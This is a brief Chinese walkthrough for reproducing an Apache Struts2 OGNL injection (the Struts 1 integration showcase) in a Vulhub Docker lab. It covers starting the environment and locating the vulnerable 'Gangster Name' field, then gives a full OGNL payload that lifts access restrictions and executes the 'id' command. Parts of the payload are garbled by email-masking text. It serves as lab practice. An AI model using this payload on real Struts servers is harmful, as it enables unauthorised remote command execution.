我在docker中搭得的vulhub靶场
1.开启环境
命令
开启docker :service docker start
启动环境 :docker-compose up -d
2.环境启动好后访问http://your-ip:8080/showcase/
3.这个漏洞在integraton下的struts1处
4.访问Integration/Struts 1 Integration:
5.触发OGNL表达式的位置是Gangster Name这个表单,在此处填写poc即可
poc:%{(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)????(#container=#context[‘com.opensymphony.xwork2.ActionContext.container’]).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#[email protected]@toString(@[email protected]().exec(‘id’).getInputStream())).(#q)}